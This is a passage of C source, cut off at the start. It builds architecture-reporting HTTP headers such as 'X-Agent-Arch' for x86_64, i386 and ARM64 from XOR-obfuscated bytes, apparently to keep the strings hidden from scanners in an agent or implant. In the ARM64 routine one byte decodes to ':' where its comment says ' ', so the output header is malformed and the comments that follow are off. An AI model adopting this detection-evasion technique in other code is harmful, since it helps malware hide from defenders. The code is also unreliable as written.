    buf[9] = (CHAR)(0x34u ^ key); /* 'o' */
    buf[10] = (CHAR)(0x36u ^ key); /* 'm' */
    buf[11] = (CHAR)(0x36u ^ key); /* 'm' */
    buf[12] = (CHAR)(0x32u ^ key); /* 'i' */
    buf[13] = (CHAR)(0x2Fu ^ key); /* 't' */
    buf[14] = (CHAR)(0x61u ^ key); /* ':' */
    buf[15] = (CHAR)(0x7Bu ^ key); /* ' ' */
    buf[16] = 0;
}

/* "X-Agent-Arch: x86_64\r\nX-Agent-Process-Arch: x86_64\r\n" - 64-bit x86 */
static VOID StrValArchX64(PCHAR buf)
{
    volatile UINT32 key = 0x24;
    buf[0] = (CHAR)(0x7Cu ^ key); /* 'X' */
    buf[1] = (CHAR)(0x09u ^ key); /* '-' */
    buf[2] = (CHAR)(0x65u ^ key); /* 'A' */
    buf[3] = (CHAR)(0x43u ^ key); /* 'g' */
    buf[4] = (CHAR)(0x41u ^ key); /* 'e' */
    buf[5] = (CHAR)(0x4Au ^ key); /* 'n' */
    buf[6] = (CHAR)(0x50u ^ key); /* 't' */
    buf[7] = (CHAR)(0x09u ^ key); /* '-' */
    buf[8] = (CHAR)(0x65u ^ key); /* 'A' */
    buf[9] = (CHAR)(0x56u ^ key); /* 'r' */
    buf[10] = (CHAR)(0x47u ^ key); /* 'c' */
    buf[11] = (CHAR)(0x4Cu ^ key); /* 'h' */
    buf[12] = (CHAR)(0x1Eu ^ key); /* ':' */
    buf[13] = (CHAR)(0x04u ^ key); /* ' ' */
    buf[14] = (CHAR)(0x5Cu ^ key); /* 'x' */
    buf[15] = (CHAR)(0x1Cu ^ key); /* '8' */
    buf[16] = (CHAR)(0x12u ^ key); /* '6' */
    buf[17] = (CHAR)(0x7Bu ^ key); /* '_' */
    buf[18] = (CHAR)(0x12u ^ key); /* '6' */
    buf[19] = (CHAR)(0x10u ^ key); /* '4' */
    buf[20] = (CHAR)(0x29u ^ key); /* '\r' */
    buf[21] = (CHAR)(0x2Eu ^ key); /* '\n' */
    buf[22] = (CHAR)(0x7Cu ^ key); /* 'X' */
    buf[23] = (CHAR)(0x09u ^ key); /* '-' */
    buf[24] = (CHAR)(0x65u ^ key); /* 'A' */
    buf[25] = (CHAR)(0x43u ^ key); /* 'g' */
    buf[26] = (CHAR)(0x41u ^ key); /* 'e' */
    buf[27] = (CHAR)(0x4Au ^ key); /* 'n' */
    buf[28] = (CHAR)(0x50u ^ key); /* 't' */
    buf[29] = (CHAR)(0x09u ^ key); /* '-' */
    buf[30] = (CHAR)(0x74u ^ key); /* 'P' */
    buf[31] = (CHAR)(0x56u ^ key); /* 'r' */
    buf[32] = (CHAR)(0x4Bu ^ key); /* 'o' */
    buf[33] = (CHAR)(0x47u ^ key); /* 'c' */
    buf[34] = (CHAR)(0x41u ^ key); /* 'e' */
    buf[35] = (CHAR)(0x57u ^ key); /* 's' */
    buf[36] = (CHAR)(0x57u ^ key); /* 's' */
    buf[37] = (CHAR)(0x09u ^ key); /* '-' */
    buf[38] = (CHAR)(0x65u ^ key); /* 'A' */
    buf[39] = (CHAR)(0x56u ^ key); /* 'r' */
    buf[40] = (CHAR)(0x47u ^ key); /* 'c' */
    buf[41] = (CHAR)(0x4Cu ^ key); /* 'h' */
    buf[42] = (CHAR)(0x1Eu ^ key); /* ':' */
    buf[43] = (CHAR)(0x04u ^ key); /* ' ' */
    buf[44] = (CHAR)(0x5Cu ^ key); /* 'x' */
    buf[45] = (CHAR)(0x1Cu ^ key); /* '8' */
    buf[46] = (CHAR)(0x12u ^ key); /* '6' */
    buf[47] = (CHAR)(0x7Bu ^ key); /* '_' */
    buf[48] = (CHAR)(0x12u ^ key); /* '6' */
    buf[49] = (CHAR)(0x10u ^ key); /* '4' */
    buf[50] = (CHAR)(0x29u ^ key); /* '\r' */
    buf[51] = (CHAR)(0x2Eu ^ key); /* '\n' */
    buf[52] = 0;
}

/* "X-Agent-Arch: i386\r\nX-Agent-Process-Arch: i386\r\n" - 32-bit x86 */
static VOID StrValArchI386(PCHAR buf)
{
    volatile UINT32 key = 0x37;
    buf[0] = (CHAR)(0x6Fu ^ key); /* 'X' */
    buf[1] = (CHAR)(0x1Au ^ key); /* '-' */
    buf[2] = (CHAR)(0x76u ^ key); /* 'A' */
    buf[3] = (CHAR)(0x50u ^ key); /* 'g' */
    buf[4] = (CHAR)(0x52u ^ key); /* 'e' */
    buf[5] = (CHAR)(0x59u ^ key); /* 'n' */
    buf[6] = (CHAR)(0x43u ^ key); /* 't' */
    buf[7] = (CHAR)(0x1Au ^ key); /* '-' */
    buf[8] = (CHAR)(0x76u ^ key); /* 'A' */
    buf[9] = (CHAR)(0x45u ^ key); /* 'r' */
    buf[10] = (CHAR)(0x54u ^ key); /* 'c' */
    buf[11] = (CHAR)(0x5Fu ^ key); /* 'h' */
    buf[12] = (CHAR)(0x0Du ^ key); /* ':' */
    buf[13] = (CHAR)(0x17u ^ key); /* ' ' */
    buf[14] = (CHAR)(0x5Eu ^ key); /* 'i' */
    buf[15] = (CHAR)(0x04u ^ key); /* '3' */
    buf[16] = (CHAR)(0x0Fu ^ key); /* '8' */
    buf[17] = (CHAR)(0x01u ^ key); /* '6' */
    buf[18] = (CHAR)(0x3Au ^ key); /* '\r' */
    buf[19] = (CHAR)(0x3Du ^ key); /* '\n' */
    buf[20] = (CHAR)(0x6Fu ^ key); /* 'X' */
    buf[21] = (CHAR)(0x1Au ^ key); /* '-' */
    buf[22] = (CHAR)(0x76u ^ key); /* 'A' */
    buf[23] = (CHAR)(0x50u ^ key); /* 'g' */
    buf[24] = (CHAR)(0x52u ^ key); /* 'e' */
    buf[25] = (CHAR)(0x59u ^ key); /* 'n' */
    buf[26] = (CHAR)(0x43u ^ key); /* 't' */
    buf[27] = (CHAR)(0x1Au ^ key); /* '-' */
    buf[28] = (CHAR)(0x67u ^ key); /* 'P' */
    buf[29] = (CHAR)(0x45u ^ key); /* 'r' */
    buf[30] = (CHAR)(0x58u ^ key); /* 'o' */
    buf[31] = (CHAR)(0x54u ^ key); /* 'c' */
    buf[32] = (CHAR)(0x52u ^ key); /* 'e' */
    buf[33] = (CHAR)(0x44u ^ key); /* 's' */
    buf[34] = (CHAR)(0x44u ^ key); /* 's' */
    buf[35] = (CHAR)(0x1Au ^ key); /* '-' */
    buf[36] = (CHAR)(0x76u ^ key); /* 'A' */
    buf[37] = (CHAR)(0x45u ^ key); /* 'r' */
    buf[38] = (CHAR)(0x54u ^ key); /* 'c' */
    buf[39] = (CHAR)(0x5Fu ^ key); /* 'h' */
    buf[40] = (CHAR)(0x0Du ^ key); /* ':' */
    buf[41] = (CHAR)(0x17u ^ key); /* ' ' */
    buf[42] = (CHAR)(0x5Eu ^ key); /* 'i' */
    buf[43] = (CHAR)(0x04u ^ key); /* '3' */
    buf[44] = (CHAR)(0x0Fu ^ key); /* '8' */
    buf[45] = (CHAR)(0x01u ^ key); /* '6' */
    buf[46] = (CHAR)(0x3Au ^ key); /* '\r' */
    buf[47] = (CHAR)(0x3Du ^ key); /* '\n' */
    buf[48] = 0;
}

/* "X-Agent-Arch: aarch64\r\nX-Agent-Process-Arch: aarch64\r\n" - ARM64 */
static VOID StrValArchArm64(PCHAR buf)
{
    volatile UINT32 key = 0x35;
    buf[0] = (CHAR)(0x6Du ^ key); /* 'X' */
    buf[1] = (CHAR)(0x18u ^ key); /* '-' */
    buf[2] = (CHAR)(0x74u ^ key); /* 'A' */
    buf[3] = (CHAR)(0x52u ^ key); /* 'g' */
    buf[4] = (CHAR)(0x50u ^ key); /* 'e' */
    buf[5] = (CHAR)(0x5Bu ^ key); /* 'n' */
    buf[6] = (CHAR)(0x41u ^ key); /* 't' */
    buf[7] = (CHAR)(0x18u ^ key); /* '-' */
    buf[8] = (CHAR)(0x74u ^ key); /* 'A' */
    buf[9] = (CHAR)(0x47u ^ key); /* 'r' */
    buf[10] = (CHAR)(0x56u ^ key); /* 'c' */
    buf[11] = (CHAR)(0x5Du ^ key); /* 'h' */
    buf[12] = (CHAR)(0x0Fu ^ key); /* ':' */
    buf[13] = (CHAR)(0x15u ^ key); /* ' ' */
    buf[14] = (CHAR)(0x54u ^ key); /* 'a' */
    buf[15] = (CHAR)(0x54u ^ key); /* 'a' */
    buf[16] = (CHAR)(0x47u ^ key); /* 'r' */
    buf[17] = (CHAR)(0x56u ^ key); /* 'c' */
    buf[18] = (CHAR)(0x5Du ^ key); /* 'h' */
    buf[19] = (CHAR)(0x03u ^ key); /* '6' */
    buf[20] = (CHAR)(0x01u ^ key); /* '4' */
    buf[21] = (CHAR)(0x38u ^ key); /* '\r' */
    buf[22] = (CHAR)(0x3Fu ^ key); /* '\n' */
    buf[23] = (CHAR)(0x6Du ^ key); /* 'X' */
    buf[24] = (CHAR)(0x18u ^ key); /* '-' */
    buf[25] = (CHAR)(0x74u ^ key); /* 'A' */
    buf[26] = (CHAR)(0x52u ^ key); /* 'g' */
    buf[27] = (CHAR)(0x50u ^ key); /* 'e' */
    buf[28] = (CHAR)(0x5Bu ^ key); /* 'n' */
    buf[29] = (CHAR)(0x41u ^ key); /* 't' */
    buf[30] = (CHAR)(0x18u ^ key); /* '-' */
    buf[31] = (CHAR)(0x65u ^ key); /* 'P' */
    buf[32] = (CHAR)(0x47u ^ key); /* 'r' */
    buf[33] = (CHAR)(0x5Au ^ key); /* 'o' */
    buf[34] = (CHAR)(0x56u ^ key); /* 'c' */
    buf[35] = (CHAR)(0x50u ^ key); /* 'e' */
    buf[36] = (CHAR)(0x46u ^ key); /* 's' */
    buf[37] = (CHAR)(0x46u ^ key); /* 's' */
    buf[38] = (CHAR)(0x18u ^ key); /* '-' */
    buf[39] = (CHAR)(0x74u ^ key); /* 'A' */
    buf[40] = (CHAR)(0x47u ^ key); /* 'r' */
    buf[41] = (CHAR)(0x56u ^ key); /* 'c' */
    buf[42] = (CHAR)(0x5Du ^ key); /* 'h' */
    buf[43] = (CHAR)(0x0Fu ^ key); /* ' ' */
    buf[44] = (CHAR)(0x54u ^ key); /* 'a' */
    buf[45] = (CHAR)(0x54u ^ key); /* 'a' */
    buf[46] = (CHAR)(0x47u ^ key); /* 'r' */
    buf[47] = (CHAR)(0x56u ^ key); /* 'c' */
    buf[48] = (CHAR)(0x5Du ^ key); /* 'h' */
    buf[49] = (CHAR)(0x03u ^ key); /* '6' */
    buf[50] = (CHAR)(0x01u ^ key); /* '4' */
    buf[51] = (CHAR)(0x38u ^ key); /* '\r' */
    buf[52] = (CHAR)(0x3Fu ^ key); /* '\n' */
    buf[53] = 0;
}
